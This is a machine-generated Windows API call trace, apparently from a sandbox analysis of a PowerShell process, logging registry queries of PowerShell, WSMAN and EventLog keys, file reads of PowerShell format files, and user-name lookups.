	[0733.633] ReadFile (in: hFile=0x2e4, lpBuffer=0x305e958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x305e958*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0733.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x2e4) returned 0x0
	[0733.633] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0733.633] CoTaskMemAlloc (cb=0x5a) returned 0x1b976350
	[0733.633] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976350, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0733.633] CoTaskMemFree (pv=0x1b976350) 
	[0733.633] RegCloseKey (hKey=0x2e4) returned 0x0
	[0733.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0733.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0733.634] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xbd4cb932, Data2=0xf38c, Data3=0x47fb, Data4=([0]=0xa7, [1]=0xc1, [2]=0xf, [3]=0xfa, [4]=0x7f, [5]=0x4d, [6]=0xb1, [7]=0x44))) returned 0x0
	[0733.634] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x64f73235, Data2=0xa079, Data3=0x4503, Data4=([0]=0x9f, [1]=0x66, [2]=0x97, [3]=0x50, [4]=0x1a, [5]=0x28, [6]=0xd8, [7]=0x5b))) returned 0x0
	[0733.634] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0733.634] GetFileType (hFile=0x2e4) returned 0x1
	[0733.634] SetErrorMode (uMode=0x1) returned 0x1
	[0733.635] GetFileType (hFile=0x2e4) returned 0x1
	[0733.635] ReadFile (in: hFile=0x2e4, lpBuffer=0x309c740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x309c740*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.635] ReadFile (in: hFile=0x2e4, lpBuffer=0x309c740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x309c740*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.635] ReadFile (in: hFile=0x2e4, lpBuffer=0x309c740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x309c740*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.635] ReadFile (in: hFile=0x2e4, lpBuffer=0x309c740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x309c740*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0735.128] ReadFile (in: hFile=0x2e4, lpBuffer=0x309c740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x309c740*, lpNumberOfBytesRead=0xed098*=0xe98, lpOverlapped=0x0) returned 1
	[0735.129] ReadFile (in: hFile=0x2e4, lpBuffer=0x309bd40, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x309bd40*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0735.129] ReadFile (in: hFile=0x2e4, lpBuffer=0x309c740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x309c740*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0735.129] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x2e4) returned 0x0
	[0735.129] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0735.129] CoTaskMemAlloc (cb=0x5a) returned 0x1b976350
	[0735.129] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976350, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0735.130] CoTaskMemFree (pv=0x1b976350) 
	[0735.130] RegCloseKey (hKey=0x2e4) returned 0x0
	[0735.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0735.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0735.130] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xf61f97d3, Data2=0xfa8f, Data3=0x4d9d, Data4=([0]=0xb5, [1]=0x52, [2]=0x69, [3]=0x77, [4]=0x8d, [5]=0xef, [6]=0xc2, [7]=0x4c))) returned 0x0
	[0735.131] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xd5783c74, Data2=0x2c2, Data3=0x4d50, Data4=([0]=0xa9, [1]=0xd7, [2]=0xe9, [3]=0xa4, [4]=0xce, [5]=0xda, [6]=0x81, [7]=0x3f))) returned 0x0
	[0735.143] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0735.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.144] CoTaskMemFree (pv=0x243180) 
	[0735.144] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0735.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.144] CoTaskMemFree (pv=0x243180) 
	[0735.144] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0735.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.145] CoTaskMemFree (pv=0x243180) 
	[0735.145] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0735.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.145] CoTaskMemFree (pv=0x243180) 
	[0735.152] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0735.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.152] CoTaskMemFree (pv=0x243180) 
	[0735.153] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0735.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.153] CoTaskMemFree (pv=0x243180) 
	[0735.153] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0735.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.153] CoTaskMemFree (pv=0x243180) 
	[0735.157] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed338 | out: phkResult=0xed338*=0x2e4) returned 0x0
	[0735.158] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed23c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed238*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0735.158] CoTaskMemFree (pv=0x0) 
	[0735.158] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0735.158] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x1f9450, lpcchValueName=0xed2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0735.158] CoTaskMemFree (pv=0x1f9450) 
	[0735.158] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0735.158] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x1f9450, lpcchValueName=0xed2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0735.159] CoTaskMemFree (pv=0x1f9450) 
	[0735.159] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0735.159] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x1f9450, lpcchValueName=0xed2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0735.159] CoTaskMemFree (pv=0x1f9450) 
	[0735.159] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed2cc, lpData=0x0, lpcbData=0xed2c8*=0x0 | out: lpType=0xed2cc*=0x1, lpData=0x0, lpcbData=0xed2c8*=0x8) returned 0x0
	[0735.159] CoTaskMemAlloc (cb=0xc) returned 0x26c550
	[0735.159] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed29c, lpData=0x26c550, lpcbData=0xed298*=0x8 | out: lpType=0xed29c*=0x1, lpData="2.0", lpcbData=0xed298*=0x8) returned 0x0
	[0735.159] CoTaskMemFree (pv=0x26c550) 
	[0738.115] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed288 | out: phkResult=0xed288*=0x2e4) returned 0x0
	[0738.115] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed18c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed188*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.115] CoTaskMemFree (pv=0x0) 
	[0738.116] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.116] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x1f9450, lpcchValueName=0xed238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0738.116] CoTaskMemFree (pv=0x1f9450) 
	[0738.116] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.116] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x1f9450, lpcchValueName=0xed238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0738.116] CoTaskMemFree (pv=0x1f9450) 
	[0738.116] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.116] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x1f9450, lpcchValueName=0xed238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0738.116] CoTaskMemFree (pv=0x1f9450) 
	[0738.116] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed21c, lpData=0x0, lpcbData=0xed218*=0x0 | out: lpType=0xed21c*=0x1, lpData=0x0, lpcbData=0xed218*=0x8) returned 0x0
	[0738.116] CoTaskMemAlloc (cb=0xc) returned 0x26c350
	[0738.116] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed1ec, lpData=0x26c350, lpcbData=0xed1e8*=0x8 | out: lpType=0xed1ec*=0x1, lpData="2.0", lpcbData=0xed1e8*=0x8) returned 0x0
	[0738.116] CoTaskMemFree (pv=0x26c350) 
	[0738.118] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0738.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.118] CoTaskMemFree (pv=0x243180) 
	[0738.124] CoTaskMemAlloc (cb=0x104) returned 0x243180
	[0738.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x243180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.124] CoTaskMemFree (pv=0x243180) 
	[0738.130] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2b8 | out: phkResult=0xed2b8*=0x314) returned 0x0
	[0738.135] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed22c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed228, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed22c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed228*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.135] CoTaskMemFree (pv=0x0) 
	[0738.136] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.136] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.137] CoTaskMemFree (pv=0x1f9450) 
	[0738.137] CoTaskMemFree (pv=0x0) 
	[0738.137] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.137] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.137] CoTaskMemFree (pv=0x1f9450) 
	[0738.137] CoTaskMemFree (pv=0x0) 
	[0738.137] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.137] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.137] CoTaskMemFree (pv=0x1f9450) 
	[0738.137] CoTaskMemFree (pv=0x0) 
	[0738.137] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.137] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.137] CoTaskMemFree (pv=0x1f9450) 
	[0738.137] CoTaskMemFree (pv=0x0) 
	[0738.137] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.137] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.138] CoTaskMemFree (pv=0x1f9450) 
	[0738.138] CoTaskMemFree (pv=0x0) 
	[0738.138] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.138] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.138] CoTaskMemFree (pv=0x1f9450) 
	[0738.138] CoTaskMemFree (pv=0x0) 
	[0738.138] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.138] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.138] CoTaskMemFree (pv=0x1f9450) 
	[0738.138] CoTaskMemFree (pv=0x0) 
	[0738.138] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.138] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.138] CoTaskMemFree (pv=0x1f9450) 
	[0738.138] CoTaskMemFree (pv=0x0) 
	[0738.138] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0738.139] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x1f9450, lpcchName=0xed2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0738.139] CoTaskMemFree (pv=0x1f9450) 
	[0738.139] CoTaskMemFree (pv=0x0) 
	[0738.139] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x318) returned 0x0
	[0738.139] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.139] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x31c) returned 0x0
	[0738.139] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.139] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x320) returned 0x0
	[0738.139] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.140] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x324) returned 0x0
	[0738.140] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.140] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x328) returned 0x0
	[0738.140] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.140] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x32c) returned 0x0
	[0738.140] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.140] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x330) returned 0x0
	[0738.140] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.141] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x334) returned 0x0
	[0738.141] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x0) returned 0x2
	[0738.141] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x338) returned 0x0
	[0738.141] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed318 | out: phkResult=0xed318*=0x33c) returned 0x0
	[0738.141] RegCloseKey (hKey=0x33c) returned 0x0
	[0738.141] RegCloseKey (hKey=0x314) returned 0x0
	[0738.142] RegCloseKey (hKey=0x338) returned 0x0
	[0739.602] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0739.602] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0739.603] CoTaskMemFree (pv=0x1b9a61c0) 
	[0739.605] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.605] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0739.605] CoTaskMemFree (pv=0x1f9450) 
	[0739.621] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed268 | out: phkResult=0xed268*=0x340) returned 0x0
	[0739.621] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed1dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.621] CoTaskMemFree (pv=0x0) 
	[0739.621] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.621] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.622] CoTaskMemFree (pv=0x1f9450) 
	[0739.622] CoTaskMemFree (pv=0x0) 
	[0739.622] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.622] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.622] CoTaskMemFree (pv=0x1f9450) 
	[0739.622] CoTaskMemFree (pv=0x0) 
	[0739.622] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.622] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.623] CoTaskMemFree (pv=0x1f9450) 
	[0739.623] CoTaskMemFree (pv=0x0) 
	[0739.623] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.623] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.623] CoTaskMemFree (pv=0x1f9450) 
	[0739.623] CoTaskMemFree (pv=0x0) 
	[0739.623] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0739.623] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x1f9450, lpcchName=0xed268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0739.623] CoTaskMemFree (pv=0x1f9450) 
